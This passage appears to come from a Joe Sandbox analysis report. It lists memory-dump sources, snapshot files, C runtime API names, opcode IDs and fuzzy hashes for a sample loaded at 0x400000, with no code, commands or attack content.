                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809854901-0
                                                                                                                        • Opcode ID: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                        • Opcode Fuzzy Hash: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: 61b9ef8a6f765c58139a33a573ef994292dae8fcc9e916c915b81b6d9ebba236
                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                        • Opcode Fuzzy Hash: 61b9ef8a6f765c58139a33a573ef994292dae8fcc9e916c915b81b6d9ebba236
                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __calloc_crt
                                                                                                                        • String ID: P$B$`$B
                                                                                                                        • API String ID: 3494438863-235554963
                                                                                                                        • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                        • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                                                                                        • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                        • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 208892515-0
                                                                                                                        • Opcode ID: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                        • Opcode Fuzzy Hash: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89